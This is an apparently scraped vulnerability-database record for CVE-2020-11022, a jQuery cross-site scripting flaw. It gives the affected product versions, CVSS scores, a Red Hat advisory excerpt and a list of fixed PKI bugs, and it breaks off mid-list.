These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-8203
https://access.redhat.com/security/cve/CVE-2020-11022
https://access.redhat.com/security/cve/CVE-2020-11023
https://access.redhat.com/security/cve/CVE-2020-14333
https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBX2t0HtzjgjWX9erEAQhpWg/+KolNmhmQCrst8TmYsC2IgSdHP+q0LKLj
gdPZYu0ixOpwLLiAhrsoDXqL3H3w7UDSKkSISgPMEqEde4Vp+zI37O1q3E/P7CAj
rfLGuL1UDEiy0q0g1BP13GrPlg6K4fR5wQAnTB6vD/ZY+wd50Z0T+NGAxd2w68bM
R5q1kSOUPc4AZt25FORU2cmp775Y7DWazMWHC77uiJHgyCwVqLtdO09iEnglZDKJ
BynwyT8exZKXxmmpE4QZ4X7wNo3Y0mTiRZo5eyxxQpwj9X+qw1V+pBdtMH/C1yhk
J+X1f+wDoe2jCx2bqPXqp6EgFSHnJNt96jV0oTdD0f8rMgWcBDStNXdagPBmBCBp
t+Kq3BZx0Oqkig4f+DCEmoS0V0fB9UQLg0Q/M9p1bTfYQkbn+BMHL7CAp8UyAzPH
A1HlnP7TtQgplFvoap82xt2pXh97VvI6x3sBGHyW4Fz0SykhRYx3dAgmqy5nEssl
5ApWZ87M3l+2tUh4ZOJAtzRDt9sL5KQsXjp1jZaK/gWBsL4Suzr9AIrs4NmRmXnY
TzxdXgIY6C+dWmB4TPhcJE5etcvtorqvs93d47yBdpRyO/IlbEw0vLUBdVZZuj9N
mqp6RcHqDKm6Yv4B73Ud5my44wSRWVWtBxO6fivQOQG7iqCyIlA3M3LUMkVy+fxc
bvmOI0eIsZw=
=Jhpi
-----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services data foundation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6.0.0"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.0-19.1.2"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.0"
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.14"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.3.0"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "hospitality materials control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.2"
},
{
"_id": null,
"model": "financial services data governance for us regulatory reporting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.6"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "enterprise session border controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.4"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "snapcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "insurance allocation manager for enterprise profitability",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services analytical applications reconciliation framework",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance accounting analyzer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "agile product lifecycle management for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "jquery",
"scope": "gte",
"trust": 1.0,
"vendor": "jquery",
"version": "1.2"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services data governance for us regulatory reporting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "7.0"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.6"
},
{
"_id": null,
"model": "communications diameter signaling router idih\\:",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.0.0.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for european banking authority",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.8"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2.1"
},
{
"_id": null,
"model": "policy automation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.20"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.0"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "policy automation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications application session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.8m0"
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services market risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.3.6.0.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "7.70"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.1.0"
},
{
"_id": null,
"model": "financial services balance sheet planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services funds transfer pricing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "insurance allocation manager for enterprise profitability",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "insurance data foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6-8.1.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.56"
},
{
"_id": null,
"model": "financial services basel regulatory capital basic",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for us federal reserve",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.2"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.0"
},
{
"_id": null,
"model": "insurance insbridge rating and underwriting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6.0.0"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "financial services data foundation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.20"
},
{
"_id": null,
"model": "storagetek acsls",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "snap creator framework",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services basel regulatory capital internal ratings based approach",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "jquery",
"scope": "lt",
"trust": 1.0,
"vendor": "jquery",
"version": "3.5.0"
},
{
"_id": null,
"model": "financial services liquidity risk management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0.0.0"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "log correlation engine",
"scope": "lt",
"trust": 1.0,
"vendor": "tenable",
"version": "6.0.9"
},
{
"_id": null,
"model": "communications diameter signaling router idih\\:",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "healthcare foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1.1"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.4.0"
},
{
"_id": null,
"model": "financial services asset liability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services regulatory reporting for us federal reserve",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "max data",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "financial services regulatory reporting for european banking authority",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "agile product supplier collaboration for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.5.0.23.0"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "retail customer management and segmentation foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.1.3"
},
{
"_id": null,
"model": "hitachi ops center common services",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "jquery",
"scope": null,
"trust": 0.8,
"vendor": "jquery",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
}
],
"trust": 0.6
},
"cve": "CVE-2020-11022",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11022",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-163559",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11022",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2020-11022",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-11022",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11022",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2020-11022",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-11022",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULHUB",
"id": "VHN-163559",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11022",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"description": {
"_id": null,
"data": "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1376706 - restore SerialNumber tag in caManualRenewal xml\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1406505 - KRA ECC installation failed with shared tomcat\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1666907 - CC: Enable AIA OCSP cert checking for entire cert chain\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page\n1710171 - CVE-2019-10146 pki-core: Reflected XSS in \u0027path length\u0027 constraint field in CA\u0027s Agent page\n1721684 - Rebase pki-servlet-engine to 9.0.30\n1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 
\n1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp\n1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server\n1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI\n1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak\n1824939 - JSS: add RSA PSS support - RHEL 8.3\n1824948 - add RSA PSS support - RHEL 8.3\n1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab [rhel-8]\n1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in \u0027path length\u0027 constraint field in CA\u0027s Agent page [rhel-8]\n1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password\n1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired=\"true\" but no secret\n1850004 - CVE-2020-11023 jquery: Passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException\n1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing\n1855273 - CVE-2020-15720 pki: Dogtag\u0027s python client does not validate certificates\n1855319 - Not able to launch pkiconsole\n1856368 - kra-key-generate request is failing\n1857933 - CA Installation is failing with ncipher v12.30 HSM\n1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request\n1869893 - Common certificates are missing in CS.cfg on shared PKI instance\n1871064 - replica install failing during pki-ca component configuration\n1873235 - pki 
